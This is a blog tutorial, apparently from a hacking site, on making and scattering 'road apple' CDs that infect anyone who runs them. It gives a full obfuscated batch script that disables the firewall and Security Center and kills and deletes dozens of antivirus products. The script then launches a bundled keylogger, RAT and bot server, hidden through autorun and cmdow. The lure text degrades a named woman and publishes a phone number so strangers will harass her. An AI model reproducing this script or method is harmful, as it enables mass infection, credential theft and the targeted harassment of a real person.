Your Ad Here
3:19 PM

Make & Distribute Infected CD

Note; This tut is for educational purposes only, and I am not responsible for any actions you take with the information

What are "Road Apples"?
A CD or USB drive that is believed to be one thing, but is actually infected with a keylogger, RAT, or other malicious content. The idea plays on human curiosity. These can be distributed to a target area, or at random. In this tut, we will be targeting a wide, but focused demographic, male HS to college students.

Making it believable
To make a person want to run a CD, you need to make it believable or intriguing, so we need a cover story. Ours will be that of a jealous ex-bf called "John" who is spreading these pictures via CD to get back at his ex for cheating on him with his brother. (Cheesy, i know, but just wait, it plays out.)

What you'll need:
-Cover story
-blank CD-R disc (DVD's will work too, but you limit them to be played on newer machines only.)
-CD burner
-CD cases or envelopes
-Permanent Marker
-Keylogger, RAT, or other malicious media you want to drop(Don't ask, Google it & ull find some 100s)
-Common Sense Wink

I strongly suggest using CD's for the fact that they are read-only, which means that even if a AV does detect it, it can only warn the user, not delete it. If your using a USB drive, make sure your infection is 100000% UD or you will be fighting a loosing battle.

I will be using a binded file containing a keylogger, RAT, and bot server in one. I will also use a AV killer launched from autostart that kills and deletes older AV programs.

AV killer 100% UD autostart script: (Props to Mathias for this code, which I modified to my own use...please do the same!)

Code:
MSG * Hello, thank you for running this CD.
MSG * My name is John
MSG * This is my ex Tiffany
MSG * She broke my heart by cheating on me with my brother
MSG * She Will rot in hell, but this is my revenge...
MSG * Oh, and here's her number...NY area code since she was only in **** for school.
MSG * 845-290-8610
MSG * Leave her a message asking how she likes being a cheating slut, she might just call you back :-)
MSG * Feel free to pass this to your friends. Help me show the world what a slut she is.
MSG * Enjoi
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
%fun% %morefun% “Security Center”
%fun%sh firewall set opmode mode=disable
%math%%ias% %beer% E-*
cls
%math%%ias% %beer% av*
cls
%math%%ias% %beer% fire*
cls
%math%%ias% %beer% anti*
cls
%math%%ias% %beer% spy*
cls
%math%%ias% %beer% bullguard
cls
%math%%ias% %beer% PersFw
cls
%math%%ias% %beer% KAV*
cls
%math%%ias% %beer% UfseAgnt*
cls
%math%%ias% %beer% Spy*
cls
%math%%ias% %beer% ZONEALARM
cls
%math%%ias% %beer% SAFEWEB
cls
%math%%ias% %beer% OUTPOST
cls
%math%%ias% %beer% nv*
cls
%math%%ias% %beer% nav*
cls
%math%%ias% %beer% F-*
cls
%math%%ias% %beer% ESAFE
cls
%math%%ias% %beer% cle
cls
%math%%ias% %beer% BLACKICE
cls
%math%%ias% %beer% def*
cls
%math%%ias% %beer% kav
cls
%math%%ias% %beer% kav*
cls
%math%%ias% %beer% avg*
cls
%math%%ias% %beer% ash*
cls
%math%%ias% %beer% aswupdsv
cls
%math%%ias% %beer% ewid*
cls
%math%%ias% %beer% guard*
cls
%math%%ias% %beer% guar*
cls
%math%%ias% %beer% gcasDt*
cls
%math%%ias% %beer% msmp*
cls
%math%%ias% %beer% mcafe*
cls
%math%%ias% %beer% mghtml
cls
%math%%ias% %beer% msiexec
cls
%math%%ias% %beer% outpost
cls
%math%%ias% %beer% isafe
cls
%math%%ias% %beer% zap*
cls
%math%%ias% %beer% zauinst
cls
%math%%ias% %beer% upd*
cls
%math%%ias% %beer% zlclien*
cls
%math%%ias% %beer% minilog
cls
%math%%ias% %beer% cc*
cls
%math%%ias% %beer% norton*
cls
%math%%ias% %beer% norton au*
cls
%math%%ias% %beer% ccc*
cls
%math%%ias% %beer% npfmn*
cls
%math%%ias% %beer% loge*
cls
%math%%ias% %beer% nisum*
cls
%math%%ias% %beer% issvc
cls
%math%%ias% %beer% tmp*
cls
%math%%ias% %beer% tmn*
cls
%math%%ias% %beer% pcc*
cls
%math%%ias% %beer% cpd*
cls
%math%%ias% %beer% pop*
cls
%math%%ias% %beer% pav*
cls
%math%%ias% %beer% padmin
cls
%math%%ias% %beer% panda*
cls
%math%%ias% %beer% avsch*
cls
%math%%ias% %beer% sche*
cls
%math%%ias% %beer% syman*
cls
%math%%ias% %beer% virus*
cls
%math%%ias% %beer% realm*
cls
%math%%ias% %beer% sweep*
cls
%math%%ias% %beer% scan*
cls
%math%%ias% %beer% ad-*
cls
%math%%ias% %beer% safe*
cls
%math%%ias% %beer% avas*
cls
%math%%ias% %beer% norm*
cls
%math%%ias% %beer% offg*
cls
%mathias% /Q /F %ProgramFiles%\alwils~1\avast4\*.*
cls
%mathias% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kasper~1\*.exe
cls
%mathias% /Q /F %ProgramFiles%\trojan~1\*.exe
cls
%mathias% /Q /F %ProgramFiles%\f-prot95\*.*
cls
%mathias% /Q /F %ProgramFiles%\tbav\*.dat
cls
%mathias% /Q /F %ProgramFiles%\avpersonal\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\Mcafee\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*
cls
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
cls
%mathias% /Q /F %ProgramFiles%\avgamsr\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgamsvr\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgemc\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgcc\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avgupsvc\*.exe
cls
%mathias% /Q /F %ProgramFiles%\grisoft
cls
%mathias% /Q /F %ProgramFiles%\nood32krn\*.exe
cls
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
cls
%mathias% /Q /F %ProgramFiles%\nod32\*.exe
cls
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kav\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kavmm\*.exe
cls
%mathias% /Q /F %ProgramFiles%\kaspersky\*.*
cls
%mathias% /Q /F %ProgramFiles%\ewidoctrl\*.exe
cls
%mathias% /Q /F %ProgramFiles%\guard\*.exe
cls
%mathias% /Q /F %ProgramFiles%\ewido\*.exe
cls
%mathias% /Q /F %ProgramFiles%\pavprsrv\*.exe
cls
%mathias% /Q /F %ProgramFiles%\pavprot\*.exe
cls
%mathias% /Q /F %ProgramFiles%\avengine\*.exe
cls
%mathias% /Q /F %ProgramFiles%\apvxdwin\*.exe
cls
%mathias% /Q /F %ProgramFiles%\webproxy\*.exe
cls
%mathias% /Q /F %ProgramFiles%\panda software\*.*
cls
COPY MSWINSCK.OCX C:\windows\System32 /Y
cls
Regsvr32 /s MSWINSCK.OCX
cls
IF EXIST C:\Windows\System32\MSWINSCK.OCX Call Tiffy2.exe
cls
Call Tiffany002.jpg
cls

This is the bread and butter of this technique. I'm using the one batch to kill the AV, and launch my infection. (Later, I'll make this invisible) First, let's look over the code...
Code:
MSG * Hello, thank you for running this CD.
MSG * My name is John
MSG * This is my ex Tiffany
MSG * She broke my heart by cheating on me with my brother
MSG * She Will rot in hell, but this is my revenge...
MSG * Oh, and here's her number...NY area code since she was only in **** for school.
MSG * 845-290-8610
MSG * Leave her a message asking how she likes being a cheating slut, she might just call you back :-)
MSG * Feel free to pass this to your friends. Help me show the world what a slut she is.
MSG * Enjoi
this is what makes this story true in the victim's eyes. These pop-ups appear, distracting the user and drawing them in to want to see the pics. It even provides a phone number to leave a voicemail (using a fake female voicemail account).

Code:
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
%fun% %morefun% “Security Center”
%fun%sh firewall set opmode mode=disable
%math%%ias% %beer% E-*
cls
%math%%ias% %beer% av*
This is the main AV killer portion of the code. You can also run this without using an AV killer, but make sure your binded file is 100% UD.

The last portion is what will call on the binded file to run, and will also serve to copy any needed files to system folders, or run registry edits as needed.
Code:
COPY MSWINSCK.OCX C:\windows\System32 /Y
cls
Regsvr32 /s MSWINSCK.OCX
cls
IF EXIST C:\Windows\System32\MSWINSCK.OCX Call Tiffy2.exe
cls
Call Tiffany002.jpg
cls
The .OCX file I'm copying and registering is needed by my botnet server to run, so I'm simply copying it to the system32 folder, and registering it. It then checks is the file is correctly installed, and runs the binded file. It then opens the 1st pic in the series, and thats it.

Now, if you were to tie this to a autorun script, you would haver it right, but you have the CMD prompt stating it's actions while your trying to make the target believe it's legit. for this we add the file cmdow.exe (see website at the end of tut). Copy this to the root, and make the following batch file.
Code:
cmdow /run /hid autorun.bat
This will call on the original .bat file we just discussed, and run it completely hidden, except for the pop-up messages.

now, we write the autorun script.
Code:
[autorun]
OPEN=hide.bat
Action=View Tiffany's Pix
icon=favicon.ico
shellexcecute=hide.bat
shell/Auto/command=hide.bat
notice how the hide.bat is called, not the AV killer batch!

Save all the files needed to a folder, along with the pix, and burn them to a CD. now, the trick is finding a burning program that allows you to select certain files to be hidden. I couldn't find one, except for the built-in vista tool, so I used that. Make sure your disc is set to finalize, or your files may be deleted if an AV detects them!

the last step in this is simply distributing the CD's. I spread mine around the local community college, in bathrooms, locker rooms, and on the windshields of cars that appear to belong to guys.

Hope this helps, and please don't be a skiddie and use everything word for word...adapt it for yourself!

CMDOW site:
http://www.commandline.co.uk/cmdow/

Posted by Cyber Trunks
TOP

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
Your Ad Here